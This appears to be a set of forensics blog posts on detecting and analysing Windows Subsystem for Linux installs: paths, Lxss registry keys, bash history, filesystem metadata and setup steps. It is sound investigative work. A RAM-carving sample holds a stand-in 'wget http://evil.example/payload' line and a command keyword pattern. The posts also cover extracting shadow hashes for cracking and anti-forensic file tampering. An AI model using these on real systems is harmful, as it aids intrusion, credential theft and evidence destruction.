Further Forensicating of Windows Subsystem for Linux

This is a short follow-up to my two recent posts, 'Windows Subsystem for Linux and Forensic Analysis' and 'Forensic Analysis of Systems that have Windows Subsystem for Linux Installed'. No sooner had I pressed publish on the latter than a new Windows Insider Program update was pushed to my PC. Prior to this update my attempts to install openSUSE and SLES were failing repeatedly, so I was unable to test whether multiple userlands could be installed side by side. The update appeared to have resolved the issue, so I was keen to dive in and confirm the answer to that niggling question. Unfortunately for me, it opened a can of worms which necessitated this follow-up post to expand upon, and in some instances correct, its predecessors.

The immediate question was quickly answered. Can an individual user install multiple userlands/ distributions side by side?

Yes. They. Can.

Per the screenshot, I successfully installed four userlands side by side: Ubuntu (via the Beta install method), Ubuntu (via the Windows Store), openSUSELeap (via the Windows Store) and SUSELinuxEnterpriseServer (via the Windows Store). This raises the question: where are the corresponding files for these distinct Linux userland installs? The eagle-eyed reader may have cottoned on to the fact that two instances of Ubuntu could be installed, one using each of the two installation methods. In my prior testing I was limited to Ubuntu installed via the Beta installation method; the other three installations were completed using the Windows Store.

Detecting Windows Subsystem for Linux (installed via Windows Store)

As per my previous posts, if you install WSL using the beta method the Bash executable will be found at:

C:\Windows\System32\bash.exe

However, installation of any of the three currently available userlands via the store causes both the application files and the associated filesystem to be installed in different locations. The installation is still on a per user basis, so the points raised regarding activity attribution still stand. The core executable associated with each of the currently available userlands can be found at:

C:\Program Files\WindowsApps\CanonicalGroupLimited.UbuntuonWindows_1604.2017.922.0_x64__79rhkp1fndgsc\ubuntu.exe
C:\Program Files\WindowsApps\46932SUSE.openSUSELeap42.2_1.1.0.0_x64__022rs5jcyhyac\openSUSE-42.exe
C:\Program Files\WindowsApps\46932SUSE.SUSELinuxEnterpriseServer12SP2_1.1.0.0_x64__022rs5jcyhyac\SLES-12.exe

This location is liable to change with future application and Windows updates. Similarly, the location of the root file system for each is quite different from the location where the Beta version installs.
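As a triage aid, package directories matching the known distro publishers can be flagged programmatically. The sketch below is purely illustrative, assuming the publisher prefixes seen in the paths above; in practice you would feed it a directory listing of C:\Program Files\WindowsApps and corroborate against the registry artifacts discussed later:

```python
# Publisher prefixes observed for the currently available WSL distro packages
# (an assumption based on the paths above; future distros will differ).
KNOWN_PUBLISHERS = ("CanonicalGroupLimited", "46932SUSE")

def wsl_packages(dir_names):
    """Return WindowsApps directory names matching a known WSL distro publisher."""
    return [d for d in dir_names if d.startswith(KNOWN_PUBLISHERS)]

dirs = [
    "CanonicalGroupLimited.UbuntuonWindows_1604.2017.922.0_x64__79rhkp1fndgsc",
    "46932SUSE.openSUSELeap42.2_1.1.0.0_x64__022rs5jcyhyac",
    "46932SUSE.SUSELinuxEnterpriseServer12SP2_1.1.0.0_x64__022rs5jcyhyac",
    "Microsoft.WindowsCalculator_10.1709.2703.0_x64__8wekyb3d8bbwe",
]
print(wsl_packages(dirs))
```

Note that a publisher-prefix match alone is weak evidence; it simply narrows the review set.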

To summarise my previous posts, installs of 'Bash on Ubuntu on Windows' using the beta installation method cause notable files to be created within C:\Users\[Username]\AppData\Local\lxss, with specific subfolders for home, root and rootfs which are then mounted when Bash is executed. Installation of any of the currently available userlands via the Windows Store now creates the associated file system within the packages directory for that application. The current paths where the rootfs is located for each install are as follows:


This location is also liable to change with future application and Windows updates. What is notable is that while the beta install separates /, /home and /root into distinct locations which are individually mounted, the 'rootfs' directory is now mounted as / and thereafter /home and /root exist within that structure. You may recall that one benefit of the beta method was that when a user uninstalled WSL, the rootfs directory was deleted but /home was left intact, so data which might be pertinent to a case was preserved. Unfortunately for us, this is no longer the case: if a user chooses the uninstall option, either via the store or by right-clicking on the start menu shortcut, all user data is also removed.

The Beta install also created a notable Registry key at:


However, after a Windows update and the installation of subsequent additional userlands, this key and its content have been moved one layer deeper; they can now be found at:


Additional values have also been added. Per the below screenshot, you will note that there is now a DistributionName value, which for Beta 'Bash on Ubuntu on Windows' installs is set to... 'Legacy'. Evidencing that the timing of my previous posts was impeccable as ever:

{12345678-1234-5678-0123-456789abcdef} Registry Key

The '{12345678-1234-5678-0123-456789abcdef}' is the distro_guid associated with the particular distribution, and as such, analysis of the contents of the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Lxss key will allow you to identify which userland environments are currently installed for any particular user. At the time of writing there are four distro_guid keys you may observe:

  1. {12345678-1234-5678-0123-456789abcdef} - "Legacy" (Bash on Ubuntu on Windows)
  2. {b651c2ea-ab01-46ae-8c95-09209e4272fd} - SLES-12
  3. {d4085d24-9def-43b3-9a17-de87d9bba371} - openSUSE-42
  4. {ff9afada-c0e4-4c9c-ac50-e5fb13b4b142} - Ubuntu
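If you have exported the Lxss key to a .reg file rather than working against a live hive, the distro_guid-to-name mapping can be pulled out with a few lines of Python. A minimal sketch; the export text below is a hand-built illustration, not a verbatim capture:

```python
import re

# Illustrative .reg export fragment of the Lxss key (not a verbatim capture).
REG_EXPORT = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Lxss\{12345678-1234-5678-0123-456789abcdef}]
"DistributionName"="Legacy"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Lxss\{ff9afada-c0e4-4c9c-ac50-e5fb13b4b142}]
"DistributionName"="Ubuntu"
'''

def distro_names(reg_text):
    """Map each distro_guid subkey of Lxss to its DistributionName value."""
    guids = {}
    current = None
    for line in reg_text.splitlines():
        key = re.match(r'\[.*\\Lxss\\(\{[0-9a-f-]+\})\]', line, re.I)
        if key:
            current = key.group(1)
            continue
        name = re.match(r'"DistributionName"="(.+)"', line)
        if name and current:
            guids[current] = name.group(1)
    return guids

print(distro_names(REG_EXPORT))
```

The same mapping can of course be read directly from a mounted NTUSER.DAT with your registry tool of choice.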

The SLES, openSUSE and Ubuntu keys contain three additional values which are not found for the legacy install. Specifically, 'DefaultEnvironment' (REG_MULTI_SZ), 'KernelCommandLine' (REG_SZ) and 'PackageFamilyName' (REG_SZ). A screenshot of one example for {ff9afada-c0e4-4c9c-ac50-e5fb13b4b142} (Ubuntu), is provided below:

{ff9afada-c0e4-4c9c-ac50-e5fb13b4b142} Registry Key

By default, DefaultEnvironment and KernelCommandLine were found to be the same for all three of the tested userlands but may be modified by a user or in later updates. 'DefaultEnvironment' contains environment variables and 'KernelCommandLine' contains, you guessed it, the kernel command line statements. Their values are detailed below for reference.


BOOT_IMAGE=/kernel init=/init ro
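The kernel command line follows the standard key=value / bare-flag format, so it can be broken out generically when comparing installs. A minimal sketch:

```python
def parse_cmdline(cmdline):
    """Split a kernel command line into a dict; bare flags map to True."""
    opts = {}
    for token in cmdline.split():
        key, sep, value = token.partition("=")
        opts[key] = value if sep else True
    return opts

print(parse_cmdline("BOOT_IMAGE=/kernel init=/init ro"))
# {'BOOT_IMAGE': '/kernel', 'init': '/init', 'ro': True}
```

Deviations from the default shown above (for example, a modified init) would be worth a closer look.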

The PackageFamilyName value contains a single string which relates to the Windows Store package name, and as such can help identify the correct file system for active installs. For our three userlands the values were:


As detailed earlier in the post, the application path and file system locations contain the same strings.

Analysis of Windows installed applications has a number of other implications which I won't explore at this time. These include the myriad additional data sources which relate to user activity with regard to Windows Store-installed applications, and the fact that prefetch is not created or updated (unlike when launching Bash installed via the Beta method).


Forensic Analysis of Systems that have Windows Subsystem for Linux Installed

*** EDIT 2017-10-17 ***

Windows Subsystem for Linux was in Beta at the time of writing and all artifacts/ paths mentioned relate to installation of WSL/ 'Bash on Ubuntu on Windows', using the Beta methodology detailed in my last post. Installation of a Linux userland via the Windows Store causes notable files to be located elsewhere within Windows. This is addressed in my addendum post 'Further Forensicating of Windows Subsystem for Linux'.

*** /EDIT 2017-10-17 ***

In my last post I provided a little bit of background on Windows Subsystem for Linux ('WSL') and provided details on some of the artifacts you can look out for to identify if it has been installed and enabled. In this post we will dive into a few of the notable artifacts which speak to user activity within WSL and also some considerations when reviewing this information. The more you look the more you find, and there are a myriad of interesting edge cases you may come across. The relevance of any particular artifact will depend on your investigation and the way the suspect/user was using WSL.

In this post I will be focusing on a few specific artifacts, particularly those which relate to user activity and which have unique aspects as they relate to WSL when compared to their counterparts in a full Linux host. This is by no means a comprehensive list as the topic could and does fill multiple books, written by far smarter people than me.

Forensically Interesting Artifacts

One point to note is that where I specify an artifact location I will be referencing its location on disk as it appears when viewed in Windows; during dead box analysis this will be the path displayed in tools. Paths as they appear to the user within WSL will be different due to the various mount points that are employed; this is addressed further later in the post.

It is key to note that the installation of WSL is user specific, so there may be multiple instances of WSL installed on one system. How many you will find will depend on the number of user accounts and the number of those users who have installed a userland. My reading indicates that multiple userlands can be installed side by side, but I have yet to experiment with this. In any event, it's something to look out for and if it is indeed possible, I would assume that it will result in multiple locations to analyse per user.

Default Username

As previously mentioned, the userland installation is per user. Additionally, authentication is entirely independent of Windows authentication/ login credentials. A user is requested to define a UNIX username and password when they first run Bash. All data associated with the filesystem for the Linux userland is contained within the associated Windows users profile at %localappdata%\Lxss\. In this MSDN blog post Microsoft elaborate on this, saying "Each Windows user has their own WSL environment, and can therefore have Linux root privileges and install applications without affecting other Windows users".

It should therefore be noted that irrespective of the chosen Linux username, any activity identified within a particular WSL install can/should be attributed to the corresponding Windows user account. To labour the point and make this abundantly clear, some example scenarios are outlined below. The examples are based on a Windows system with multiple users, 'UserA', 'UserB', etc.:

Scenario 1: User 'UserA' installs WSL and 'Bash on Ubuntu on Windows' and sets their Linux username as 'UserA'. Based upon human nature it is likely that a significant proportion of users will use the same username and password for WSL as they do for Windows. This is probably the most common scenario you will encounter.

Scenario 2: User 'UserA' installs WSL and 'Bash on Ubuntu on Windows' but sets their UNIX username to be 'UserB'. At a glance, artifacts associated with the WSL user 'UserB' may seem to relate to the Windows user 'UserB'; however, they should in fact be attributed to 'UserA'. For example, the .bash_history file for this user will be located at:


i.e. within the Windows profile associated with UserA. The same can be said for almost all notable artifacts as they relate to WSL and user activity.

Scenario 3: Users 'UserA' and 'UserB' both install WSL and 'Bash on Ubuntu on Windows' and set their UNIX usernames as 'UserC'. These two installations are completely distinct and there is no connection between the two 'UserC' accounts despite them sharing a name.

The key point to note is that installations are user specific, independent from one another and the majority of relevant artifacts will exist within a Windows User directory or NTUSER.DAT for a specific associated Windows User Account.

The username configured at the time of installation is recorded within the NTUSER.DAT for the associated Windows user at the location below:

Key: SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss
Value: DefaultUsername (REG_SZ)
Data: [username]

Various other registry keys were identified which relate to lxss and Windows Subsystem for Linux; however, the majority of notable artifacts, particularly as they relate to user activity, are to be found on disk.

Prefetch Files

As mentioned in my previous post, Bash itself, as it relates to ‘Bash on Ubuntu on Windows’, is an executable located at %systemroot%\System32\bash.exe. When a user selects the ‘Bash on Ubuntu on Windows' shortcut, either from the desktop, start menu or taskbar, bash.exe is executed with an argument of ‘~’ and the user is presented with a new window placing them within Bash at the home directory of the default user. This causes the bash.exe prefetch file to be updated, assuming prefetch is enabled. This may provide some useful information as to the last and recent run times associated with the executable, which will evidence the use of Bash.

With that said, Bash can be accessed in a number of ways including by executing the 'bash' command from within the cmd prompt or from a PowerShell prompt. Neither of these execution methods cause the bash.exe prefetch file to be updated. Running the bash command from the run dialog does update the associated prefetch file.

Another notable detail regarding executing the 'bash' command from a cmd or PowerShell prompt is that this will not place the user at their WSL home directory but rather at the location to which the cmd/ PowerShell prompt was previously pointing.

WSL User Accounts/ Credentials

As you might expect the passwd and shadow files will be your go to location for details of the users who are set up within a specific WSL install and their associated credentials. These are located at:



These files and their respective backups 'shadow-' and 'passwd-' can be reviewed for useful information regarding the users who have been configured within WSL. The password hashes for these accounts can be extracted from the shadow file for cracking, should this be useful in your case.
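As a quick illustration of working with the shadow file, the hash field sits in the second colon-delimited column, and its $id$ prefix identifies the hashing scheme before you hand it to a cracker. The sample line below is synthetic:

```python
# crypt(3) $id$ prefixes; mapping is an assumption covering the common schemes.
HASH_IDS = {"1": "MD5", "2a": "bcrypt", "5": "SHA-256", "6": "SHA-512"}

def shadow_hash(line):
    """Return (user, hash_field, scheme) for one /etc/shadow line."""
    user, hash_field = line.split(":")[:2]
    if hash_field in ("*", "!", ""):
        return user, None, "no password set / login disabled"
    algo_id = hash_field.split("$")[1]
    return user, hash_field, HASH_IDS.get(algo_id, "unknown")

sample = "usera:$6$saltsalt$abcdefghijklmnopqrstuv:17400:0:99999:7:::"
print(shadow_hash(sample))
```

Remember that the same hash may crack to the user's Windows password, given how often credentials are reused across the two environments.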

Bash History

When determining user activity on a Linux system, the bash history is often the first port of call. The .bash_history file maintains a record of a user's command history within Bash. WSL systems with Bash for Windows installed are no exception and the bash_history file for each user can be located at:


and for root:


Anyone familiar with investigating breaches of Linux systems will likely be aware that the .bash_history file is a fantastic asset during analysis. Unfortunately, the bad guys are aware of this too, and it's common for attempts to be made to clear it. Additionally, the Bash history is often a far from comprehensive log, as it can fail to be populated under various circumstances; can behave strangely when multiple instances of bash are used simultaneously; and, by default, lacks timestamps. The behaviour of bash history under various edge cases is an interesting topic in itself and indeed it is the topic of a great presentation by Hal Pomeranz titled 'You Don't Know Jack About bash_history', a recording of which is available here.

Key points to note when reviewing the bash history under WSL:

  • Bash history file can be deleted from within Bash
  • Bash history file can be deleted from Windows
  • By default, the bash history file is only populated when a shell exits
  • Bash history file may not be populated depending on how Bash exits

Unfortunately, by default .bash_history is only populated when Bash for Windows closes cleanly. If the task is killed from task manager, or if the user simply closes the window using the close button rather than typing 'exit' then the bash_history file is not updated with the commands from that session. Windows users are somewhat accustomed to closing windows down with the close button and so I expect that bash history will be less complete for WSL when compared to a regular Linux system.

If a suspect deletes the Bash history outright, either using Bash or via Windows, there is the potential to recover the deleted file. You also have the advantage that the file will be deleted from an NTFS filesystem, as opposed to those you commonly encounter when analysing Linux systems, often making recovery easier. A further benefit of this Windows/Linux hybrid environment is that a Volume Shadow Copy may contain historical copies of the .bash_history file.

An additional area for future research will be the recovery of bash history for live or ungracefully closed sessions from RAM captured from the Windows host. It’s a fairly niche case but conceivably, if you are able to capture a RAM image of a live system where an open Bash session exists the bash history (yet to be written to disk) may be recoverable from RAM. A debatable alternative is of course to gracefully close Bash prior to performing disk imaging, causing the .bash_history to be populated with the latest sessions data, but you know your case and jurisdictional restrictions better than I do so make sure you are on the right side of them.
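Pending that research, a crude first pass is simple string carving for command-like content. The sketch below runs against a synthetic buffer, and the keyword list is an arbitrary assumption; it is in no way a substitute for proper memory analysis:

```python
import re

# Carve runs of printable text that start with common command names.
# The keyword list is illustrative only.
CANDIDATE = re.compile(rb"(?:sudo |apt-get |wget |curl |ssh |rm )[ -~]{2,80}")

def carve_commands(buf):
    """Return decoded command-like strings found in a raw bytes buffer."""
    return [m.group().decode() for m in CANDIDATE.finditer(buf)]

buf = b"\x00\x00wget http://evil.example/payload\x00\xffrm -rf /tmp/work\x00"
print(carve_commands(buf))
```

Against a real RAM image this would produce substantial noise, but it can surface session activity that never reached .bash_history on disk.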

Other Artifacts

It would be futile to attempt to detail and discuss all relevant artifacts within this post. Artifacts such as the files contained within '.ssh' or ‘.gnupg' or values in '.viminfo' (which may be relevant depending on your case) can be found where you would expect them. Various log files, with some notable exceptions (such as syslog) are to be found within the same location as you might expect to find them in an Ubuntu install.

One key area which has impact on analysis is the way WSL interacts with the host Windows file system and vice versa.

Filesystem Interaction (Accessing the Windows filesystem from WSL)

The first point to note about filesystem interaction is that the root filesystem for WSL exists within a directory on the local OS volume, which will commonly be formatted with NTFS. This has significant implications for forensic analysis, including what metadata is stored for files and the likelihood of recovering deleted data. As alluded to earlier, the full directory structure associated with WSL is subject to Volume Shadow Copy, and as such historical copies of files may be recoverable from that source; I have successfully used this to recover bash history that was otherwise unavailable.

Fixed storage devices associated with the host filesystem are presented to WSL as mounted devices at /mnt/[driveletter], and by default the 'noatime' attribute is set. e.g.:

Example content of /proc/mounts:
rootfs / lxfs rw,noatime 0 0
data /data lxfs rw,noatime 0 0
cache /cache lxfs rw,noatime 0 0
mnt /mnt lxfs rw,noatime 0 0
sysfs /sys sysfs rw,nosuid,nodev,noexec,noatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,noatime 0 0
none /dev tmpfs rw,noatime,mode=755 0 0
devpts /dev/pts devpts rw,nosuid,noexec,noatime 0 0
none /run tmpfs rw,nosuid,noexec,noatime,mode=755 0 0
none /run/lock tmpfs rw,nosuid,nodev,noexec,noatime 0 0
none /run/shm tmpfs rw,nosuid,nodev,noatime 0 0
none /run/user tmpfs rw,nosuid,nodev,noexec,noatime,mode=755 0 0
C: /mnt/c drvfs rw,noatime 0 0
D: /mnt/d drvfs rw,noatime 0 0
root /root lxfs rw,noatime 0 0
home /home lxfs rw,noatime 0 0
binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,noatime 0 0
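When reviewing a captured /proc/mounts, the drvfs entries are the ones exposing the Windows host volumes. A small sketch to pull those out, using an abbreviated version of the table above:

```python
# Abbreviated /proc/mounts content from a WSL session (see full table above).
MOUNTS = """\
rootfs / lxfs rw,noatime 0 0
C: /mnt/c drvfs rw,noatime 0 0
D: /mnt/d drvfs rw,noatime 0 0
home /home lxfs rw,noatime 0 0
"""

def host_volumes(mounts_text):
    """Return mount points backed by the Windows host filesystem (drvfs)."""
    vols = []
    for line in mounts_text.splitlines():
        device, mount_point, fs_type = line.split()[:3]
        if fs_type == "drvfs":
            vols.append(mount_point)
    return vols

print(host_volumes(MOUNTS))
```

The lxfs entries, by contrast, map back into the lxss directory structure within the user's Windows profile.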

Prior to writing this post I was under the impression that to access a volume from within WSL it had to be formatted as NTFS or ReFS. However, per this MSDN blog from April, it appears support for additional filesystems has been added, although the requisite update is only available via the Windows 10 Insider Preview at the moment. In any event, I will focus on NTFS as in the majority of cases this is likely the file system onto which WSL will have been installed.

The way Microsoft have implemented the filesystem, so as to emulate Linux behaviour while the data actually resides upon an NTFS or ReFS volume is an interesting topic, and one which is covered well in an MSDN blog post here. To quote and paraphrase: "WSL provides access to Windows files by emulating full Linux behavior for the internal Linux file system with VolFs, and by providing full access to Windows drives and files through DrvFs. As of this writing, DrvFs enables some of the functionality of Linux file systems, such as case sensitivity and symbolic links, while still supporting interoperability with Windows". 

"When opening a file in DrvFs, Windows permissions are used based on the token of the user that executed bash.exe. So in order to access files under C:\Windows, it’s not enough to use “sudo” in your bash environment, which gives you root privileges in WSL but does not alter your Windows user token. Instead, you would have to launch bash.exe elevated to gain the appropriate permissions.

"VolFs is used to mount the VFS root directory, using %LocalAppData%\lxss\rootfs as the backing storage. In addition, a few additional VolFs mount points exist, most notably /root and /home which are mounted using %LocalAppData%\lxss\root and %LocalAppData%\lxss\home respectively. The reason for these separate mounts is that when you uninstall WSL, the home directories are not removed by default, so any personal files stored there will be preserved."

The architecture of VFS within WSL as used to facilitate interoperability is conveyed in the below diagram which is taken from the same blog post:

The really useful MSDN blog posts by Jack Hammons as they relate to WSL should be considered compulsory reading if you find yourself performing a complex analysis of WSL.

This approach means that the full host file system (assuming fixed NTFS/ ReFS volumes) is accessible from within WSL. Linux tools can be used to view, modify and delete data/files on the fixed disks without leaving the traces we might expect to find were a user to perform similar actions via Windows Explorer. The facility to view and modify data without leaving traditional traces may be attractive to malicious users. Additionally, commands such as 'touch' and 'shred', which are available by default, may be tempting to the savvy WSL user who is looking to perform antiforensics.

The fact that the WSL files exist within an NTFS filesystem not only impacts the likelihood of recovery but also creates some interesting scenarios. One such example is that Linux's case sensitivity makes it possible to create files whose filenames are identical other than their case. Per the below screenshot, it is possible to use WSL to create files which Explorer would not normally permit:

Three files created using Windows Subsystem for Linux

While this is possible via WSL, various Windows applications aren't going to like it. Windows can in fact support case sensitivity; it is supported in NTFS and can be switched on by modifying the ObCaseInsensitive (DWORD) value under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel. But by default this support isn't enabled, and irrespective of this, WSL will allow case sensitive filenames to be created as per the screenshot. Attempting to copy the files to another location causes errors.
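The behaviour is easy to reproduce from any case-sensitive filesystem, which is what WSL presents to Linux tools. A minimal sketch; run on a default case-insensitive volume, the second and third creates would instead collide with the first:

```python
import os
import tempfile

def create_case_variants(dirpath):
    """Create three names differing only by case; return the directory listing."""
    for name in ("report.txt", "Report.txt", "REPORT.TXT"):
        with open(os.path.join(dirpath, name), "w") as f:
            f.write(name)
    return sorted(os.listdir(dirpath))

with tempfile.TemporaryDirectory() as d:
    print(create_case_variants(d))
```

Three distinct files on a case-sensitive volume; on a case-insensitive view the three opens hit a single file.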

This hybrid filesystem approach also has an interesting (and forensically useful) implication for file metadata. Recording file creation (or birth) time is not supported by many common Linux file systems, and indeed many Linux applications lack support for reading this attribute despite it being introduced in some modern file systems such as ext4. However, the WSL file system exists within an NTFS volume, and despite the fact that it cannot be queried or modified from within WSL, a file created timestamp is recorded within the MFT for files created using WSL. This could prove forensically useful in all manner of cases.

Filesystem Interaction (Accessing the WSL filesystem from Windows)

As detailed above, VolFs and DrvFs are employed to mount different parts of the WSL file system, and this has implications for file behaviour between these two locations. Specifically, VolFs is used to mount the VFS root directory, /root and /home, while DrvFs is used for any local fixed drives, as well as removable media and network shares now that support for these has been added.

Focusing on the core WSL file structure as located within %LocalAppData%\lxss, direct manipulation (from Windows) of data within that directory structure will not necessarily be reflected within WSL. Windows does not have a concept of inodes, and as such VolFs (in an effort to provide support for most VFS features) is required to maintain a separate record of inodes and their associated Windows file objects. If a Windows application (e.g. Explorer or Notepad) is used to create a file in a WSL home directory then that file will not be visible to the WSL user, because VolFs was not employed in the creation of the file; certain attributes are therefore missing, causing VolFs to ignore it when access is attempted from within WSL.

The same occurs with file modification: if a file within a VolFs mounted file system is modified from Windows, the MFT metadata will be updated to reflect the new last modified time; however, the stat command within WSL will show the original values. Viewing the contents of the file MAY show the correct updated content as the file is accessed on disk (or you may experience corruption/ the files may disappear from view). The reason for this is detailed by Microsoft as such:
"While VolFs files are stored in regular files on Windows in the directories mentioned above, interoperability with Windows is not supported. If a new file is added to one of these directories from Windows, it lacks the EAs needed by VolFs, so VolFs doesn’t know what to do with the file and simply ignores it. Many editors will also strip the EAs when saving an existing file, again making the file unusable in WSL. 
Additionally, since VFS caches directory entries, any modifications to those directories that are made from Windows while WSL is running may not be accurately reflected."

The various attributes which are not natively supported by NTFS, but are required by VolFs to best mimic Linux file system behavior, are stored in NTFS Extended Attributes associated with the file. I'm pleased to report that the previously mentioned Microsoft MSDN blogs go into reasonable detail on this, going so far as to detail which information is stored in EAs, reproduced below:
  • "Mode: this includes the file type (regular, symlink, FIFO, etc.) and the permission bits for the file.
  • Owner: the user ID and group ID of the Linux user and group that own the file.
  • Device ID: for device files, the device major and minor number of the device. Note that WSL currently does not allow users to create device files on VolFs.
  • File times: the file accessed, modified and changed times on Linux use a different format and granularity than on Windows, so these are also stored in the EAs.
  • In addition, if a file has any file capabilities, these are stored in an alternate data stream for the file. Note that WSL currently does not allow users to modify file capabilities for a file. The remaining inode attributes, such as inode number and file size, are derived from information kept by NTFS."
There is therefore the potential to examine the Extended Attributes to determine the Linux metadata associated with individual files. I say the potential, because fully documenting the way Extended Attributes are used by the Windows Subsystem for Linux is beyond the scope of this post. A screenshot of an example file is provided below:
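One small observation in this direction: the Mode listed above is a standard Linux st_mode value, so once extracted from the EA it can be decoded with standard tooling. The EA parsing itself is not shown here, and the attribute name (LXATTRB on the builds I examined) should be verified against your own evidence:

```python
import stat

def describe_mode(mode):
    """Render a Linux st_mode integer as an ls-style permission string."""
    return stat.filemode(mode)

print(describe_mode(0o100644))  # regular file, rw-r--r--
print(describe_mode(0o040755))  # directory, rwxr-xr-x
```

The file type and permission bits recovered this way reflect what the WSL user saw, independent of the NTFS ACLs on the backing file.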

Historical Windows Subsystem for Linux data 

One final takeaway from my various reading was the clearly conscious decision by the WSL development team to separate the rootfs, root and home filesystems and mount them independently. This is evidently done to facilitate the preservation of user data if/when WSL is uninstalled. This preservation is the default behaviour, and as such, when analysing a system which has had WSL disabled/ uninstalled, there are likely to be potential sources of evidence in the home directories which have not been removed (assuming the user hasn't gone out of their way to remove them).

There is a shedload of useful information on the MSDN blog regarding WSL. Much of which I only discovered after hours of tinkering, but this link blogs.msdn.microsoft.com/wsl will be invaluable if you find yourself having to analyse a system where WSL was used by a suspect.


Windows Subsystem for Linux and Forensic Analysis

*** EDIT 2017-10-17 ***

Windows Subsystem for Linux was in Beta at the time of writing and all artifacts/ paths mentioned relate to installation of WSL/ 'Bash on Ubuntu on Windows', using the methodology detailed in this post. Installation of a Linux userland via the Windows Store causes notable files to be located elsewhere within Windows. This is addressed in my addendum post 'Further Forensicating of Windows Subsystem for Linux'.

*** /EDIT 2017-10-17 ***

This is the first of two posts on the topic of the Windows Subsystem for Linux. In this pair of posts I hope to highlight the importance of being aware of Windows Subsystem for Linux when analysing certain systems, methods to identify its presence and forensically interesting artifacts for analysis. As with my last pair of posts, it seemed logical to break this topic down into two: a primer on Windows Subsystem for Linux (WSL) and how to identify whether it is installed on a system you are analysing, and a second post on the location of forensically interesting artifacts and other considerations during analysis.

Windows Subsystem for Linux

On 02 August 2016 Microsoft released the Windows 10 Anniversary Update, and with it they handed users the Windows Subsystem for Linux ('WSL'). WSL lets developers run Linux environments (including most command-line tools, utilities, and applications) directly on Windows, unmodified, without the overhead of a virtual machine. The majority of people I know (myself included) use Windows Subsystem for Linux to install 'Bash on Ubuntu on Windows'; indeed Ubuntu was the only userland available at release, although openSUSE and SUSE Linux Enterprise Server are both now downloadable and Fedora is apparently waiting in the wings.

Ubuntu, openSUSE and SUSE Linux Enterprise Server in the Microsoft Store

Still more recently, Microsoft announced that they were bringing WSL to Windows Server. Microsoft consider this a Beta feature for Windows 10; however I believe it will be fully supported as of the Fall Creators Update, expected to launch next month.

Evidently this is a feature in its infancy, with various aspects still only available via the Windows Insider program and further additional userlands (e.g. Fedora) promised, but yet to materialise. While WSL was initially marked as a beta feature at release, that hasn't stopped lots of keen users from installing it.

Personally, I installed Anniversary Update on my day-to-day system as soon as it was available and enabled Windows Subsystem for Linux immediately thereafter; the prospect of being able to drop into Bash and use Linux native commands was too much to resist. Since then I have employed the update and added WSL to my analysis machines and workflow. I was also able to run the old SIFT bootstrap script (with some modification) to install the myriad of tools available within SIFT to my WSL system. Full disclosure: this was a messy process which I have attempted to emulate more recently using SIFT CLI, without success (yet!). I have not rolled this out to any of my analysis systems and I wouldn't recommend doing so.

Windows Subsystem for Linux has recently garnered attention from the infosec community due to the perceived risk of 'bashware', i.e. the use of WSL to run malware which may be able to bypass Windows security software and protections. At the time of writing I believe that this has only been performed as a proof of concept and I am unaware of any instance where it has been seen in the wild. With this development in mind, analysis of artifacts associated with WSL will need to be a consideration when performing certain investigations. But this is by no means the only reason to be aware of forensic artifacts associated with WSL.

I have worked cases where the crux of the matter related to actions performed by the suspects while using Cygwin, in other cases all malicious activity was performed within a virtual machine running Linux on a Windows host. In both these scenarios it is easy for an investigator who has fallen into the Windows Forensics mindset to completely miss the presence of Linux artifacts which require analysis, and the same issue arises when we are confronted with a system with WSL enabled.

Installing Windows Subsystem for Linux

Analysis of a system with WSL does not require the investigator to install WSL themselves; however, doing so will likely prove useful for testing the behaviour of artifacts and validating the statements in this post. With that in mind, the full official instructions are available here, but the edited highlights are as follows:

With Internet Access
Ensure you are running Windows 10 Anniversary Update or later (version 1607+) on a 64-bit system.

Enable WSL via the Windows Features dialog, accessible from Control Panel -> Programs -> Programs and Features -> Turn Windows features on or off, and select the check box for Windows Subsystem for Linux (Beta), per the below screenshot:

Enabling WSL from the Windows Features

Alternatively, the same can be achieved with the PowerShell command:

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
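If you prefer to script this from an elevated command prompt rather than PowerShell, the equivalent DISM invocation should (to the best of my knowledge) be:

dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart

The /norestart switch simply suppresses the automatic reboot prompt; a restart may still be required before the feature is usable.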

Next we need to install the distribution of choice. 

Members of the 'Windows Insider Program' can download Ubuntu, openSUSE or SLES via the Windows Store. Once installed, select Launch and you will be prompted to create a UNIX user account. Once the account is created you are good to go.
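On your own test system you can confirm which store-delivered userlands are installed for the current user from PowerShell; a quick sketch (the name filter is an assumption based on the current package naming):

Get-AppxPackage | Where-Object {$_.Name -match "Ubuntu|SUSE"} | Select-Object Name, InstallLocation

The InstallLocation values returned also point you towards the application files for each distribution.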

The process is slightly more involved if you aren't a member of the Windows Insider Program. The installation can be performed by running the bash command, however you will need to enable Developer Mode first. Enable Developer Mode via:

Settings -> Update and Security -> For developers and select the Developer Mode radio button.

Once Developer Mode is enabled, launch a command prompt and execute the command 'bash'. This will prompt you to accept the license with 'y', and once accepted the Ubuntu user-mode image will be downloaded and extracted.

A new "Bash on Ubuntu on Windows" shortcut is added to the Start menu; alternatively, Bash can be accessed by running the 'bash' command from the command prompt again. When you first launch Bash you will be prompted to create a UNIX user account. Once the account is created you are good to go. Note, however, that while the version in the Windows Store is relatively up to date, this version is not, and as such it is advisable to run 'apt-get update' at this time.
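For example, from the Bash prompt the package lists can be refreshed and any outdated packages brought up to date with the standard Ubuntu commands:

sudo apt-get update && sudo apt-get upgrade

Be aware this will pull a potentially large volume of packages over the network on a freshly installed image.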

Without Internet Access
The above instructions require an internet-connected machine, which is a no-go for many lab environments. Unfortunately, Microsoft do not offer an offline installer, so we have to find an alternative solution.

There are two methods I have identified to get around this. The easier of the two is to use LxRunOffline (https://github.com/DDoSolitary/LxRunOffline), a program written by DDoSolitary which (per the readme) "uses InternetOpenUrl() in wininet.dll to download the files required. This application uses EasyHook to inject code to its process, and hooks this function and some others related. Then the download requests can be redirected to local files". This does of course require you to trust code written by an internet stranger within your airgapped lab, or to perform a full code review and compile it yourself. Full instructions for the process are available here; consider it "at your own risk".

